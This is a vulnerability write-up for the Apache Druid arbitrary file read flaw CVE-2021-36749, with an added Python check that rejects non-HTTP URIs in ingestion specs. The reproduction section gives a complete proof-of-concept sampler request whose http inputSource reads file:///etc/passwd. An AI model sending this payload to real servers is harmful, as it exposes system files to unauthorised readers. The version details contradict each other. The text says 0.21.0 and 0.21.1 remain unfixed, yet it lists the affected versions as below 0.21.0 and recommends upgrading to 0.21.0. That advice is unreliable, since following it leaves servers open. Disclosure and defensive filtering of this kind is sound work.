Apache Druid LoadData Arbitrary File Read Vulnerability CVE-2021-36749
0x01 Vulnerability Introduction
In Druid, an InputSource is the component that reads data from a data source. The HTTP InputSource, however, allows an authenticated user to read data from other sources, such as the local file system, with the privileges of the Druid server process.
This is not a privilege escalation when the user accesses Druid directly, because Druid also provides a Local InputSource that grants the same level of access. It becomes a problem when the user interacts with Druid indirectly through an application that permits an HTTP InputSource but not a Local InputSource.
In that case, the user can bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously reported as fixed in 0.21.0 under CVE-2021-26920, but it was not fixed in 0.21.0 or 0.21.1.
0x02 Affected Versions
Scope: Apache Druid < 0.21.0
0x03 Vulnerability Reproduction
In the Load Data wizard, enter the following payload in the URIs field:
file:///etc/passwd
Full request as sent to the sampler endpoint:
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 423
Origin: http://127.0.0.1:8888
Connection: close
Referer: http://127.0.0.1:8888/unified-console.html
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","inputSource":{"type":"http","uris":["file:///etc/passwd"]},"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{}},"tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
0x04 Fix
Upgrade to version 0.21.0 or later.
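Until the upgrade lands, an application that fronts Druid and only intends to expose HTTP ingestion can refuse specs whose `http` inputSource carries a non-HTTP URI. The Python check below is an added example, not code from this write-up or from the Druid project: the helper names (`iter_input_sources`, `check_spec`, `check_spec_json`) are my own, and the embedded sample body is a constructed, abbreviated copy of the sampler request shown above.

```python
import json
from urllib.parse import urlparse

# Schemes the "http" inputSource is meant to fetch; file:, jar:, ftp: etc. are refused.
ALLOWED_HTTP_SCHEMES = {"http", "https"}

# Constructed sample: abbreviated sampler request body from the write-up, as a fronting app sees it.
SAMPLE_BODY = (
    '{"type":"index","spec":{"type":"index","ioConfig":{"type":"index",'
    '"inputSource":{"type":"http","uris":["file:///etc/passwd"]},'
    '"inputFormat":{"type":"regex","pattern":"(.*)","columns":["raw"]}},'
    '"dataSchema":{"dataSource":"sample"}},"samplerConfig":{"numRows":500}}'
)

def iter_input_sources(node):
    """Yield every inputSource object in a spec, whatever depth ioConfig sits at
    (task, sampler and supervisor specs nest it differently)."""
    if isinstance(node, dict):
        if isinstance(node.get("inputSource"), dict):
            yield node["inputSource"]
        for value in node.values():
            yield from iter_input_sources(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_input_sources(value)

def check_spec(spec):
    """Return findings for a parsed spec; an empty list means it is safe to forward to Druid."""
    findings = []
    for src in iter_input_sources(spec):
        kind = src.get("type")
        if kind == "http":
            for uri in src.get("uris") or []:
                # urlparse yields "" for scheme-less paths and "file" for file:///..., both refused
                if urlparse(str(uri)).scheme.lower() not in ALLOWED_HTTP_SCHEMES:
                    findings.append(f"http inputSource with non-HTTP uri: {uri}")
        elif kind == "local":
            # Same capability the bypass reaches; a finding whenever the caller is untrusted.
            findings.append("local inputSource in externally supplied spec")
    return findings

def check_spec_json(body):
    """Check a raw request body; JSON that does not parse is itself a finding."""
    try:
        return check_spec(json.loads(body))
    except ValueError as exc:
        return [f"unparseable spec: {exc}"]
```

Run `check_spec_json` on the request body before proxying it; a non-empty result means the request should be rejected and logged.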